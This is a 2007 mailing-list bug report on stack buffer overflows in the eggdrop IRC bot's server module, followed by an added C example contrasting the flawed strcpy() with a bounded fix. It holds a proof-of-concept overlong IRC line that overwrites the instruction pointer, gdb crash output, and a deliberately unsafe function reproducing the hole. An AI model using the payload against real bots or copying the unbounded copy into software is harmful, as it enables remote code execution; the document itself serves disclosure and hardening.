Bugs: Re: server module buffer overflows

Forever B0rked forever.b0rked at gmail.com
Sun Apr 15 15:52:02 CST 2007


I forgot to mention that the tested version was 1.6.18.

On 4/15/07, Forever B0rked <forever.b0rked at gmail.com> wrote:
>
> I was taking a quick look at some of the code behind the eggie modules and
> I ran across a few stack based overflows. I am incredibly surprised that no
> one has reported these yet.
>
> It seems that you are relying on the fact that the server the bot is
> connected to is sane and not malicious, but I was able to exploit these
> flaws by opening a netcat listener and connecting the bot to it, then
> sending whatever string I needed to.
>
> For example:
>
> static int gotmsg(char *from, char *msg)
> {
>   char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
>        *p, *p1, *code;
>
> .......
>
>   ignoring = match_ignore(from);
>   to = newsplit(&msg);
>   fixcolon(msg);
>   /* Only check if flood-ctcp is active */
>   strcpy(uhost, from);  /* unbounded copy of server-supplied 'from' into buf[UHOSTLEN] */
>
> By sending the following string:
>
> :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test
>
> (that's 368 bytes)
>
> gdb output:
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to process 14990]
> 0x42424242 in ?? ()
> (gdb) i r $eip
> eip            0x42424242       0x42424242
>
> You overwrite the instruction pointer with 0x42424242. It should be
> obvious that this could allow remote code execution as well. I didn't spend
> too much time looking at the rest of the code, this just happened to catch
> my eye while I was glancing over it. I did notice a few others that were
> along the same lines as this, but I didn't test them or document them,
> although I would be happy to do so if you want more information.
>
> Given the fact that you have to convince someone to connect to a malicious
> server, this isn't -THAT- serious, but if someone had the proper console
> permissions or was able to coerce someone to connect their eggdrop to a
> malicious server, then it could result in a compromise.
>
> If you have any other questions then please let me know. I might go
> through the rest of the code in greater depth later, but I don't have the
> time right now.
>
>

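The strcpy() pattern quoted in the report, reproduced beside a bounded replacement and driven by a small IRC-line splitter, as an added example: this is not eggdrop's code and was not part of the original post. The value of UHOSTLEN (291) is assumed here, and newsplit(), gotmsg_unsafe(), gotmsg_safe(), split_irc_line(), make_overlong_line(), handle_line_safe() and handle_constructed_line() are this example's own names rather than identifiers from eggdrop 1.6.18; the overlong ":AAAA...BBBB PRIVMSG Lamestbot :test" line is constructed inline.

```c
/* Added example (not eggdrop's code): the overflow pattern from the report,
 * a bounded replacement, and a tiny IRC-line splitter to drive them.
 * UHOSTLEN's value and every function name below are this example's own
 * assumptions, not identifiers taken from eggdrop 1.6.18. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define UHOSTLEN 291   /* assumed size of the stack buffer; check eggdrop.h */

/* Return the first space-delimited word of *rest and advance *rest past it
 * (the behaviour gotmsg() relies on from newsplit()). */
static char *newsplit(char **rest)
{
    char *word = *rest, *sp = strchr(word, ' ');
    if (sp) { *sp = '\0'; *rest = sp + 1; }
    else    { *rest = word + strlen(word); }
    return word;
}

/* The bug as reported: server-controlled 'from' is strcpy()'d into a
 * fixed stack buffer. Only ever call this with a known-short 'from'. */
static int gotmsg_unsafe(char *from, char *msg)
{
    char buf[UHOSTLEN], *uhost = buf;
    char *to = newsplit(&msg);
    strcpy(uhost, from);           /* overflows once strlen(from) >= UHOSTLEN */
    return (int)(strlen(uhost) + strlen(to));
}

/* Hardened form: refuse a prefix that cannot fit with its terminator rather
 * than silently truncating it (a truncated nick!user@host is a different
 * identity), and bound every copy. Returns 0 on success, -1 on rejection. */
static int gotmsg_safe(const char *from, char *msg, char *uhost, size_t uhostlen)
{
    size_t n = strlen(from);
    char *to = newsplit(&msg);
    if (n >= uhostlen || *to == '\0')
        return -1;
    memcpy(uhost, from, n + 1);    /* n < uhostlen, so the NUL fits */
    return 0;
}

/* Split ":prefix COMMAND rest" in place. On success *prefix points past the
 * ':' and *rest at the text after COMMAND; -1 if the shape is wrong. */
static int split_irc_line(char *line, char **prefix, char **rest)
{
    if (line[0] != ':')
        return -1;
    *prefix = newsplit(&line) + 1;
    (void)newsplit(&line);         /* drop COMMAND; gotmsg() sees what follows */
    if (**prefix == '\0' || *line == '\0')
        return -1;
    *rest = line;
    return 0;
}

/* Constructed input in the report's shape: ':' + n_a 'A's + "BBBB" + PRIVMSG.
 * Caller frees the result. */
static char *make_overlong_line(size_t n_a)
{
    const char *tail = "BBBB PRIVMSG Lamestbot :test";
    char *line = malloc(1 + n_a + strlen(tail) + 1);
    if (!line) return NULL;
    line[0] = ':';
    memset(line + 1, 'A', n_a);
    strcpy(line + 1 + n_a, tail);
    return line;
}

/* Run one raw line through the hardened handler on a private copy. */
static int handle_line_safe(const char *raw)
{
    size_t len = strlen(raw);
    char *line = malloc(len + 1), *prefix, *rest, uhost[UHOSTLEN];
    int rc;
    if (!line) return -1;
    memcpy(line, raw, len + 1);
    rc = split_irc_line(line, &prefix, &rest);
    if (rc == 0)
        rc = gotmsg_safe(prefix, rest, uhost, sizeof uhost);
    free(line);
    return rc;
}

/* Build a line with n_a 'A's, run it through the hardened handler, free it. */
static int handle_constructed_line(size_t n_a)
{
    char *line = make_overlong_line(n_a);
    int rc = line ? handle_line_safe(line) : -1;
    free(line);
    return rc;
}

int main(void)
{
    char msg[] = "Lamestbot :test";
    printf("normal line      -> %d\n", handle_line_safe(":nick!user@host PRIVMSG Lamestbot :test"));
    /* ':' + 363 'A' + "BBBB" = 368 bytes of prefix, far beyond UHOSTLEN */
    printf("368-byte prefix  -> %d\n", handle_constructed_line(363));
    printf("unsafe path, short prefix -> %d\n", gotmsg_unsafe("nick!user@host", msg));
    return 0;
}
```

The hardened handler rejects the oversize prefix outright instead of truncating it, because a nick!user@host cut to UHOSTLEN-1 bytes still looks like a valid identity to later matching code; in a real bot the rejection should also be logged. gotmsg_unsafe() is kept only to show the shape of the bug, and main() feeds it a short prefix; the report notes several other copies of the same pattern, which a fix should audit in the same way.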